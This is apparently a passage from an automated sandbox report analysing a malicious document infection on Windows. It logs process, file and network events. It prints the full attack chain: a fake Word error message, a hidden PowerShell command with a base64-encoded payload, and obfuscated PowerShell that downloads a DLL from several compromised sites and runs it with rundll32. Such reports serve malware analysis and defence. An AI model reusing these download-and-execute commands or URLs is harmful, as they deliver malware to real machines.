                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1692Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: powershell.exe, 00000005.00000002.2097432715.00000000003A5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: rundll32.exe, 00000008.00000002.2121274122.000000000031D000.00000004.00000020.sdmpBinary or memory string: PPTP00VMware_S
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A823 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page execute read | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 115.21.224.117 80
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 195.159.28.230 144
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 162.241.204.233 144
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 69.38.130.14 80
                      Encrypted powershell cmdline option foundShow sources
                      Source: unknownProcess created: Base64 decoded Sv PB5o ([TYpE]("{2}{1}{5}{3}{0}{6}{4}" -F 'T','EM.I','SYsT','eC','y','o.DIR','OR') ) ; SEt-ITEm vARIaBLe:m7a9 ([typE]("{4}{2}{3}{5}{1}{6}{0}{7}" -f'n','ICEpOINtm','neT','.','sySteM.','sERv','A','aGer') ) ; $Ihv89_g=$M91G + [char](33) + $H23D;$D94M=(('P7'+'2')+'X'); (gET-variaBle pb5o -VA)::"crEaTedi`ReCt`oRY"($HOME + ((('9k'+'tNk')+'2'+'d'+('uhb9'+'kt'+'Gxlh')+('9i'+'a9kt'))."rE`PlaCe"(('9'+'kt'),'\')));$J87H=('S'+('36'+'N')); ( vaRIable M7a9 -VA )::"SEcuriTYp`RoToC`oL" = (('Tl'+'s')+'12');$X22U=('E'+('_'+'_E'));$P27pqe3 = ('E6'+'_R');$F39L=(('Q'+'94')+'W');$Ad1ra8n=$HOME+((('Ki'+'m')+('Nk2d'+'uhb')+'Ki'+'m'+('Gx'+'l')+'h9'+('i'+'aKi')+'m')-RePlace([CHAR]75+[CHAR]105+[CHAR]109),[CHAR]92)+$P27pqe3+'.d' + 'll';$V28U=('C8'+'8K');$Mriqd59='h' + 'tt' + 'p';$Kw3794x=('x '+'['+(' sh'+' ')+('b'+'://cab.my'+'kf')+'n.'+('com'+'/')+'a'+('d'+'min')+'/'+('X/'+'!')+'x'+(' '+'[ s')+'h'+(' b'+':')+('/'+'/bha')+'k'+'ti'+('vrind'+'.'+'com/c')+'g'+('i'+'-bin')+('/'+'JBbb'+'8'+'/!x [ ')+'sh'+(' b'+':')+('/'+'/van'+'ddna')+('bharg'+'a')+'ve'+('.c'+'o')+('m/ass'+'et')+'/W'+('9o'+'/')+'!'+'x '+'[ '+('s'+'h ')+('b:'+'/')+('/ie-'+'b'+'e')+('s'+'t.n')+'e'+('t/o'+'n'+'lin')+'e'+('-'+'timer'+'-')+('k'+'vh')+('xz'+'/i')+'l'+('X'+'L/!x')+(' [ s'+'h ')+('b:'+'/')+'/'+'g'+('oc'+'p'+'hon')+('gth'+'e')+('.com/'+'wp'+'-')+'co'+'nt'+('ent/'+'l')+'M'+('MC'+'/!')+('x '+'[ s')+('h'+' b://'+'ww')+'w'+('.l'+'e')+('t'+'sc')+'om'+'pa'+('r'+'eon')+('l'+'in')+('e'+'.c')+('om/d'+'e')+('.l'+'et')+'sc'+'
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Sv PB5o ([TYpE]("{2}{1}{5}{3}{0}{6}{4}" -F 'T','EM.I','SYsT','eC','y','o.DIR','OR') ) ; SEt-ITEm vARIaBLe:m7a9 ([typE]("{4}{2}{3}{5}{1}{6}{0}{7}" -f'n','ICEpOINtm','neT','.','sySteM.','sERv','A','aGer') ) ; $Ihv89_g=$M91G + [char](33) + $H23D;$D94M=(('P7'+'2')+'X'); (gET-variaBle pb5o -VA)::"crEaTedi`ReCt`oRY"($HOME + ((('9k'+'tNk')+'2'+'d'+('uhb9'+'kt'+'Gxlh')+('9i'+'a9kt'))."rE`PlaCe"(('9'+'kt'),'\')));$J87H=('S'+('36'+'N')); ( vaRIable M7a9 -VA )::"SEcuriTYp`RoToC`oL" = (('Tl'+'s')+'12');$X22U=('E'+('_'+'_E'));$P27pqe3 = ('E6'+'_R');$F39L=(('Q'+'94')+'W');$Ad1ra8n=$HOME+((('Ki'+'m')+('Nk2d'+'uhb')+'Ki'+'m'+('Gx'+'l')+'h9'+('i'+'aKi')+'m')-RePlace([CHAR]75+[CHAR]105+[CHAR]109),[CHAR]92)+$P27pqe3+'.d' + 'll';$V28U=('C8'+'8K');$Mriqd59='h' + 'tt' + 'p';$Kw3794x=('x '+'['+(' sh'+' ')+('b'+'://cab.my'+'kf')+'n.'+('com'+'/')+'a'+('d'+'min')+'/'+('X/'+'!')+'x'+(' '+'[ s')+'h'+(' b'+':')+('/'+'/bha')+'k'+'ti'+('vrind'+'.'+'com/c')+'g'+('i'+'-bin')+('/'+'JBbb'+'8'+'/!x [ ')+'sh'+(' b'+':')+('/'+'/van'+'ddna')+('bharg'+'a')+'ve'+('.c'+'o')+('m/ass'+'et')+'/W'+('9o'+'/')+'!'+'x '+'[ '+('s'+'h ')+('b:'+'/')+('/ie-'+'b'+'e')+('s'+'t.n')+'e'+('t/o'+'n'+'lin')+'e'+('-'+'timer'+'-')+('k'+'vh')+('xz'+'/i')+'l'+('X'+'L/!x')+(' [ s'+'h ')+('b:'+'/')+'/'+'g'+('oc'+'p'+'hon')+('gth'+'e')+('.com/'+'wp'+'-')+'co'+'nt'+('ent/'+'l')+'M'+('MC'+'/!')+('x '+'[ s')+('h'+' b://'+'ww')+'w'+('.l'+'e')+('t'+'sc')+'om'+'pa'+('r'+'eon')+('l'+'in')+('e'+'.c')+('om/d'+'e')+('.l'+'et')+'sc'+'
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',hyhQYxhuLCMLb
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',nCbdzah
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',#1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcA
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBR